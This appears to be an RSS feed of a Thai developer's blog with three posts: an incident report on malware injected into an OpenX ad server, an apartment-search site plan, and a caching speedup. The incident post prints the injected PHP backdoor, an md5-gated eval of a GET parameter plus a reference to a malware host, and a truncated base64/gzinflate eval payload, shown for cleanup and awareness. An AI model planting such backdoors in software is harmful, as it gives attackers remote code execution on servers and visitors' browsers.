tanomsak.com » Project http://www.tanomsak.com Random Thoughts on Random Things by Tanomsak Sun, 23 May 2010 08:39:03 +0000 en hourly 1 http://wordpress.org/?v=3.0 เมื่อเวป ddproperty.com โดนระบุว่าเป็นอันตราย!! http://www.tanomsak.com/index.php/2010/03/%e0%b9%80%e0%b8%a1%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b9%80%e0%b8%a7%e0%b8%9b-ddproperty-com-%e0%b9%82%e0%b8%94%e0%b8%99%e0%b8%a3%e0%b8%b0%e0%b8%9a%e0%b8%b8%e0%b8%a7%e0%b9%88%e0%b8%b2%e0%b9%80%e0%b8%9b/ http://www.tanomsak.com/index.php/2010/03/%e0%b9%80%e0%b8%a1%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b9%80%e0%b8%a7%e0%b8%9b-ddproperty-com-%e0%b9%82%e0%b8%94%e0%b8%99%e0%b8%a3%e0%b8%b0%e0%b8%9a%e0%b8%b8%e0%b8%a7%e0%b9%88%e0%b8%b2%e0%b9%80%e0%b8%9b/#comments Wed, 31 Mar 2010 13:26:30 +0000 tanomsak http://www.tanomsak.com/?p=418

เมื่อวันที่ 22 มีนาคม เกิดปัญหาขึ้นกับเวป ddproperty.com ครับ เรื่องของเรื่องมีอยู่ว่า Chrome ไม่ยอมให้ผมเข้าเวป โดยแจ้งว่า อาจจะติด Malware ได้ ปฎิกิริยาแรกคือ เหงื่อตก – -” โดนอะไรเข้า (วะ) เนี้ย

พอลองหาข้อมูลดู เลยพบว่าเวปเราโดน Google เข้าใจว่ามีการเรียกเวปที่เป็น Trojan จากเวป ddproperty.com บางหน้า Google ก็บอกให้ไปดู Guide line ยาวเยียดเลย พอผมบ่นไปทาง twitter คุณ @iampz แนะนำมาว่าให้เข้าไปดูใน Webmaster Tool ผมเลยได้แบะแสว่ามันมาจาก openx (ขอบคุณ @iampz อีกทีครับ) เพราะใน section Labs ของ Webmaster Tool แจ้งว่า openx code เป็นปัญหา

แต่เนื่องจากผมไม่ได้มีความรู้อะไรกับ openx เลยนอกจาก ลงตาม installation wizard ที่แสนจะง่าย บวกกับความรู้ php แค่หางอึ่ง งานหนักเลยเป็นการค้นหาว่าตัวปัญหามันอยู่ที่ไหน สุดท้ายไปเจอ blog ของท่านหนึ่งเขียนไว้เรื่องปัญหาความปลอดภัยของ openx ผมเลยสามารถแก้ปัญหาได้

เผื่อมีประโยชน์กับท่านอื่นๆ ผมขอเล่าประสบการณ์ให้ฟังครับ

  1. ปัญหาที่เจอคือมีการแก้ไข plugin ของ openx ให้ไปเรียกเวป ads.is ซึ่งเป็นตัว distribute พวกเวป trojan อีกทีครับ
  2. files แรก ที่ผมเจอว่ามีปัญหาคือ  ./openx/var/plugins/cache/mergedDeliveryFunctions.php โดยมี code แปลกปลอมแบบนี้แปะเพิ่มมาครับ อันนี้หาเจอเพราะว่าดูจาก blog ข้างต้นครับ

    $urlw = "http://stats.ads.is/stats?counter=128";
    $asiebc = 'ade93d134c231cea7b0b5619bff4f82f';
    if (isset($_GET['dothis']) && (md5($_GET['code'])==$asiebc)) eval($_GET['dothis']);
    if (strpos($_SERVER['REQUEST_URI'],"/afr.php") or strpos($_SERVER['REQUEST_URI'],"/adframe.php")) {
    if (!isset($_COOKIE['OADSA'])) {
    setcookie("OADSA", 1, time()+3600);
    echo "\n";
    }
    } elseif (strpos($_SERVER['REQUEST_URI'],"/ajs.php") or strpos($_SERVER['REQUEST_URI'],"/spcjs.php") or strpos($_SERVER['REQUEST_URI'],"/adjs.php")) {
    if (!isset($_COOKIE['OADSA'])) {
    setcookie("OADSA", 1, time()+3600);
    echo "document.write('');\n";
    }
    }
  3. file ที่สองที่พบปัญหาคือ ./openx/plugins/bannerTypeHtml/oxHtml/genericHtml.delivery.php โดยมี eval พวก encode แปลกๆแปะไว้ยาวมาก

    if (basename($_SERVER['PHP_SELF'])=='genericHtml.delivery.php') {
    eval(gzinflate(base64_decode("FJ3HjtvYFkX/5Y0McMCchoxiznnywCjmnL++VUAbaMC2LF6ds/daUkkqz7T/932bserTvfyXpVtJYP8vynwqyn//ExVUylcrF7qowmMCUL9ZZ3DeKDGOnk1Dnt+KBQLm7CJhC9EICZOyqG34CRI0MazSdqLnrYHwwcYSbT3Ao7ogAPq072d9Aaqg7bhMedE0FvfSeHgr3LN3pbg0ZDHcFZBQGG0Ga8wzNuW+KY1CrW5S1dWBYd+Z76rHKNon5IYQ0IfQd5BFJvvsHc4ltxVxBUdciM ....
  4. พอลบสอง files นี้ไปแล้ว ก็ขอให้ Google Review เวปเราใหม่ โดยภายใน 6-8 ชั่วโมง Google ก็จะเข้ามา index แล้ว review ถ้าไม่เจอปัญหาก็จะเอาข้อความเตือนออกให้ครับ ตรงข้อนี้ผมเสียเวลาไปเยอะ เนื่องจากตอนแรกยังหาปัญหาไม่เจอ แต่ว่าดันขอ review ไปก่อน พอ Google ยังเจอปัญหาอยู่เลยต้องรอ review รอบใหม่
  5. เท่าที่ลองหาข้อมูลดู openx version เก่าๆ มีปัญหาเรื่องความปลอดภัยอยู่ ทำให้ hacker ใช้จู่โจมและวาง code พวกนี้ในเครื่องเราได้ครับ upgrade จรเป็น version ใหม่ๆดีกว่าครับ
  6. จริงๆปัญหาพวกนี้เราสามารถป้องกันได้ ทั้งการ upgrade openx อยู่เสมอ หรือว่าคอยตรวจสอบ log file เพื่อดูว่ามีการเปลี่ยนแปลงอะไรในระบบบ้าง เนื่องจากจริงๆ ผมโดนวางยาตั้งแต่กลางเดือนกุมภาพันธ์แล้วครับ ถ้าใส่ใจดูแลหน่อยก็คงเห็น log เรื่อง update plugin แปลกๆที่เราไม่ได้ทำไปนานแล้วครับ

จบเรื่องนี้ไป ผมได้ความรู้ใหม่ไปหลายอย่าง และได้ตระหนักว่า งาน system admin มีความสำคัญไม่แพ้งาน develop เลยครับ

]]> http://www.tanomsak.com/index.php/2010/03/%e0%b9%80%e0%b8%a1%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b9%80%e0%b8%a7%e0%b8%9b-ddproperty-com-%e0%b9%82%e0%b8%94%e0%b8%99%e0%b8%a3%e0%b8%b0%e0%b8%9a%e0%b8%b8%e0%b8%a7%e0%b9%88%e0%b8%b2%e0%b9%80%e0%b8%9b/feed/ 3 ทำเวปใหม่ allapartment.in.th http://www.tanomsak.com/index.php/2010/03/%e0%b8%97%e0%b8%b3%e0%b9%80%e0%b8%a7%e0%b8%9b%e0%b9%83%e0%b8%ab%e0%b8%a1%e0%b9%88-allapartment-in-th/ http://www.tanomsak.com/index.php/2010/03/%e0%b8%97%e0%b8%b3%e0%b9%80%e0%b8%a7%e0%b8%9b%e0%b9%83%e0%b8%ab%e0%b8%a1%e0%b9%88-allapartment-in-th/#comments Sun, 14 Mar 2010 12:26:49 +0000 tanomsak http://www.tanomsak.com/?p=394

ตอนนี้พวกเราที่ ddproperty.com กำลังพัฒนาเวปใหม่อยู่ครับ วันนี้ผมขอเล่า idea ของเวปนี้ให้ฟังครับ และขอรับฟังความคิดเห็นของทุกคนครับ เป็นเวปค้นหาอพาร์ทเม้นท์ ชื่อ allapartment.in.th ครับ

ขอเริ่มต้นจากปัญหาก่อนครับ

เคยต้องหาอพาร์ทเม้นท์ใหม่ไหมครับ ตอนเวลาย้ายที่ทำงานหรือตอนเข้าเรียนใหม่ อย่างถ้าต้องการหาอพาร์เม้นท์ ใกล้ที่ทำงานใหม่แถวๆ รามอินทรา เราอาจจะหาใน Google ด้วยคำว่า “อพาร์ทเม้น รามอินทรา” เราก็จะได้ผลการค้นหาประมาณนี้

Google เจอผลการค้นหา 1,100,000 เวป ที่เยอะขนาดนี้เพราะว่ามันซ้ำกัน ส่วนใหญ่เราก็ลองเปิดดูอันบนๆ แล้วก็ลองค้นหาใหม่ด้วยคำอื่น

ถ้าผมมีความต้องการเฉพาะเจาะจงมากขึ้น เช่น ผมต้องใช้งาน Internet ตลอดเวลา เลยอยากหาห้องที่มี WIFI ด้วย การหาด้วย keyword “อพาร์ทเม้น รามอินทรา WIFI” ใน Google ก็ได้ผลการค้นหาออกมาไม่น่าพอใจเท่าไหร่

ที่เป็นอย่างนี้เพราะว่าการทำงานของ Google เน้นการค้นหาตาม keyword เป็นหลัก และออกแบบมา เพื่อค้นหาเวปโดยเท่าๆไป ไม่ได้ออกแบบมาค้นหาเรื่องใดเรื่องหนึ่งโดยเฉพาะ จึง (ยัง)ไม่ค่อยเก่งในการหาข้อมูลแบบเฉพาะเจาะจงในลักษณะนี้ ปัจจุบัน Google เลยยังไม่สามารถตอบโจทย์ได้ทั้งหมด ซึ่งเป็นโอกาสของเวปที่เน้นการค้นหาข้อมูลเฉพาะด้าน

นอกจากหา Google เราอาจจะเข้าไปดูตามเวปที่รวบรวมอพาร์เม้นท์โดยเฉพาะที่มีในปัจจุบัน ซึ่งส่วนใหญ่ยังค้นหาไม่สะดวกนัก ซึ่งเป็นไปในลักษณะคล้ายๆกับเวปอสังหาฯอื่น เช่นเดียวกับ ตอนเราเริ่มทำเวป ddproperty.com เมื่อ 2 ปีก่อน พวกเราเลยคิดทำเวปค้นหาอพาร์ทเม้นท์ขึ้น และเป็นที่มาของเวป allapartment.in.th ครับ

ทีนี้เวป allapartment.in.th จะออกมาเป็นยังไง

ความตั้งใจของเรากับเวป allapartment.in.th คือ  การใช้งานง่าย ซึ่งต้องหมายถึงค้นหาเจอง่าย และดูข้อมูลง่าย การออกแบบทั้งหมดเลยเน้นเรื่องการใช้งานของผู้ค้นหาและผู้ลงประกาศเป็นหลัก แนวคิดหลักของเราเป็นแบบนี้ครับ

  • เวลาหาที่พัก ทำเลที่ตั้งเป็นปัจจัยหลักในการตัดสินใจ ในเวปนี้เราจะเน้นข้อมูลว่าอพาร์ทเม้นท์นี้อยู่ทำเลแถวไหน และห่างจากที่ำทำงาน หรือสถานศึกษาของผู้ค้นหาเท่าไหร่
  • การค้นหาและแสดงผล ในทำเล “มหาวิทยาลัยเกษตรศาสตร์”  ต้องสามารถเรียงตามระยะทางจากมหาวิทยาลัยได้ และต้อง Filter ตามคุณสมบัติเช่น WIFI, UBC ได้
  • การแสดงผลต้องอ่านง่ายไม่รกตา

ถ้าทำสามข้อข้างบนได้ดี คิดว่าน่าจะมีประโยชน์ และใช้งานง่ายอย่างที่ตั้งใจ

แต่จะว่าไป เรื่องข้างบนผมว่าทำง่ายครับเมื่อเทียบกับ การทำยังไงให้มีข้อมูลอพาร์ืทเม้นท์เยอะพอที่จะมีประโยชน์ในการค้นหา เรื่องข้อมูลเป็นเรื่องสำคัญอย่างมาก ไม่งั้นใครๆก็คงไปใช้งาน Google เหมือนเดิมเพราะ Google มี 1,100,000 ผลการค้นหา :) นี่นา

ทุกท่านมี idea ยังไงบ้างครับ ว่าจะทำยังไงให้มีข้อมูลอพาร์ทเม้นท์ครบถ้วน ถ้าให้ review อพาร์ทเม้นท์ที่เคยพักจะมีคน review ไหมครับ

ข้างล่างเป็น screenshot ของหน้าเวปที่กำลังพัฒนาครับ

]]> http://www.tanomsak.com/index.php/2010/03/%e0%b8%97%e0%b8%b3%e0%b9%80%e0%b8%a7%e0%b8%9b%e0%b9%83%e0%b8%ab%e0%b8%a1%e0%b9%88-allapartment-in-th/feed/ 4 ผลของการ Cache บวกกับ mod_deflate http://www.tanomsak.com/index.php/2009/05/actioncache-deflate-ddproperty/ http://www.tanomsak.com/index.php/2009/05/actioncache-deflate-ddproperty/#comments Wed, 27 May 2009 14:44:45 +0000 tanomsak http://www.tanomsak.com/?p=183

เมื่อเดือนก่อนมีการปรับเวป www.ddproperty.com นิดหน่อยครับ เนื่องจากเวปช้ามาก สิ่งที่ทำไปมีดังนี้ครับ

1. เพิ่ม RAM เครื่อง Server

2. ทำ action cache กับหน้ารายละเอียดประกาศทั้งหมด

3. ใช้ mod_deflate ของ apache

Google Webmaster Tools - Crawl stats.png

ผลที่ได้ เวปเร็วขึ้นทันตาเห็นเลยครับ พอแรมเยอะขึ้นใช้ swap ลดลง ระบบโดยรวมลื่นขึ้นมาก ส่วน action cache ทำให้ response time ของแต่ละหน้าลดลงเยอะเลยครับ ดูกราฟข้างบนได้เลยครับ ขนาดหน้าลดลง เวลาในการโหลดเวปลดลง คุ้มค่าสุดๆเลยครับ

ถึงว่าใครๆก็บอกให้ cache cache cache :)

]]> http://www.tanomsak.com/index.php/2009/05/actioncache-deflate-ddproperty/feed/ 0